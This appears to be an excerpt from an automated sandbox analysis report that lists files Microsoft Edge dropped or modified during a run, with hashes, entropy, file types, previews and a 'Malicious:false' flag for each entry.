                                                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                                      MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                                      SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                                      SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                                      SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.280271906902576
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:XvLZYeb8rcHEZrELFUt8V/+H54ZYeb8rcHEZrEZSJ:/lYeb8nZrExg8qoYeb8nZrEZe
                                                                                                                                                                                                                                                                                      MD5:703BC408198171291E56335E666DF042
                                                                                                                                                                                                                                                                                      SHA1:E19936887B206937A2EF1E2221DE2DE1C9D4098A
                                                                                                                                                                                                                                                                                      SHA-256:99B85C060D5D3B070086C7BA60FCD4230D93E7534A690F1DBCC71EEBBBF61CA7
                                                                                                                                                                                                                                                                                      SHA-512:C8AA45E376BFC9DA0092529E8E133E34BE9D5D24C3CCD6C15898072617927B55A975407CF577736DD7E5E26BBC40161EF6A5E05FAEF0592B8E5E3842F5D7BAEC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:26.959 1600 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-03:05:26.959 1600 Recovering log #3.2024/12/27-03:05:26.960 1600 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.280271906902576
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:XvLZYeb8rcHEZrELFUt8V/+H54ZYeb8rcHEZrEZSJ:/lYeb8nZrExg8qoYeb8nZrEZe
                                                                                                                                                                                                                                                                                      MD5:703BC408198171291E56335E666DF042
                                                                                                                                                                                                                                                                                      SHA1:E19936887B206937A2EF1E2221DE2DE1C9D4098A
                                                                                                                                                                                                                                                                                      SHA-256:99B85C060D5D3B070086C7BA60FCD4230D93E7534A690F1DBCC71EEBBBF61CA7
                                                                                                                                                                                                                                                                                      SHA-512:C8AA45E376BFC9DA0092529E8E133E34BE9D5D24C3CCD6C15898072617927B55A975407CF577736DD7E5E26BBC40161EF6A5E05FAEF0592B8E5E3842F5D7BAEC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:26.959 1600 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-03:05:26.959 1600 Recovering log #3.2024/12/27-03:05:26.960 1600 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1344
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.588943490815639
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:hItZWDYUlHXlTaYvXr2oGVlBVp/QXZ7WpV03y1x4Cxq9Ilsw0hap5MyG:hItZJkTaYvb2DYXZKpV03Sx4Lyls5aA1
                                                                                                                                                                                                                                                                                      MD5:9B31FB5C9E7EFA141AFA951E43C92909
                                                                                                                                                                                                                                                                                      SHA1:63A23AB002B08FCD5FA041B7EBD6BBA752972C3B
                                                                                                                                                                                                                                                                                      SHA-256:D4E4D11CD8FD87256FC924A77BDA4CDADA1ADD2FA891C469B2FBC065B05D35E1
                                                                                                                                                                                                                                                                                      SHA-512:3FB959F6C274A4C2D55718C0EAE1A14194F7E3B3DD9C9AC1512E34EE9914BD22F425ED5334054A838359BA0505CB9CD6749EC2CDC839151B6F83361A74138804
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:....9................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":871}.!_https://ntp.msn.com..LastKnownPV..1735286739499.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735286740539.._https://ntp.msn.com..MUID!.309DCA2A26BF68F127E0DF4827176945.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735286739589,"schedule":[-1,-1,27,20,-1,24,-1],"scheduleFixed":[-1,-1,27,20,-1,24,-1],"simpleSchedule":[21,47,25,26,45,31,16]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735286739466.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.215161763602825
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf8N9+q2PcNwi23oH+Tcwt8a2jMGIFUt8WyfqSJZmw+WyfQE9VkwOcNwi23oH+k:H9+vLZYeb8EFUt8JJ/+T9V54ZYeb8bJ
                                                                                                                                                                                                                                                                                      MD5:8CD784A5F9EBDB2C83A85896304EC127
                                                                                                                                                                                                                                                                                      SHA1:E34C7247A27977AE2A7B3A9FF19CA26AE27F5056
                                                                                                                                                                                                                                                                                      SHA-256:F06AEDA3DEDC917CA5EACD0807EF0251C9D150918323730F848BEE047EEBC98E
                                                                                                                                                                                                                                                                                      SHA-512:B8CBBBCAA262D13DC2509D337322F9CF30117F7E7814BDEFF6873FFD9613641D590916E4B23A106062960C5DD86F8244A96E8D9BE897EDFFEEEAA0C533C2531B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.687 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.688 184c Recovering log #3.2024/12/27-03:05:22.691 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.215161763602825
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf8N9+q2PcNwi23oH+Tcwt8a2jMGIFUt8WyfqSJZmw+WyfQE9VkwOcNwi23oH+k:H9+vLZYeb8EFUt8JJ/+T9V54ZYeb8bJ
                                                                                                                                                                                                                                                                                      MD5:8CD784A5F9EBDB2C83A85896304EC127
                                                                                                                                                                                                                                                                                      SHA1:E34C7247A27977AE2A7B3A9FF19CA26AE27F5056
                                                                                                                                                                                                                                                                                      SHA-256:F06AEDA3DEDC917CA5EACD0807EF0251C9D150918323730F848BEE047EEBC98E
                                                                                                                                                                                                                                                                                      SHA-512:B8CBBBCAA262D13DC2509D337322F9CF30117F7E7814BDEFF6873FFD9613641D590916E4B23A106062960C5DD86F8244A96E8D9BE897EDFFEEEAA0C533C2531B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.687 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.688 184c Recovering log #3.2024/12/27-03:05:22.691 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5f21d05e-c969-44e2-a071-3e164ff3fb27.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\70f12097-63b9-4d4b-b9f3-eb3d9ffc4023.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\86911717-b4b7-493b-81e2-698d6cc9ccc4.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1618
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                      MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                      SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                      SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                      SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.781040489370062
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:tT1H2Mk/tNxsn5gh48LD2crp+s8L2siyVXcf0L/ZJVb:V1H2MkPqnaK8ucroL2tyVXI0LhJVb
                                                                                                                                                                                                                                                                                      MD5:4B1138BF862C60A804F2928774740599
                                                                                                                                                                                                                                                                                      SHA1:EE80F98A009A069B69D978911DB9F0B82551B64E
                                                                                                                                                                                                                                                                                      SHA-256:0CA5C2ECC9E1B785EC662EA136DD7D1E0AFEDC2CC6F804BF10674275C5FA50B3
                                                                                                                                                                                                                                                                                      SHA-512:F562E21F509BD229F668AA3D0A65CD71791558AF1D073AF3DFE43D757ADC781E231B1B76CF53B7E905B287897A0A0F2032557FFDB6FB188BB1CBFEAF1AE1A5C6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1618
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                      MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                      SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                      SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                      SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.3760843474831321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSlAW4:uIEumQv8m1ccnvS11DJlGFh5pWoyBw1a
                                                                                                                                                                                                                                                                                      MD5:DEFD93FCEA39542993894D7FA8659B3A
                                                                                                                                                                                                                                                                                      SHA1:4DFDFF7A2E15CE84569759BE04B8DA2F4A5FFF00
                                                                                                                                                                                                                                                                                      SHA-256:0E5EE87104C7EE7D622C04CB3BD0B746756445D927A5E65061BBE5870553A83A
                                                                                                                                                                                                                                                                                      SHA-512:C3B2D73B218E7847A4B2C6A9FE26C3D38539C5F3C8865E2470A6520F8AD0755D1313D1A8104BC261904291E06FE63E4D2AF0A4202D9AB37CDAF391F6B243DBF7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF30c94.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3225e.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
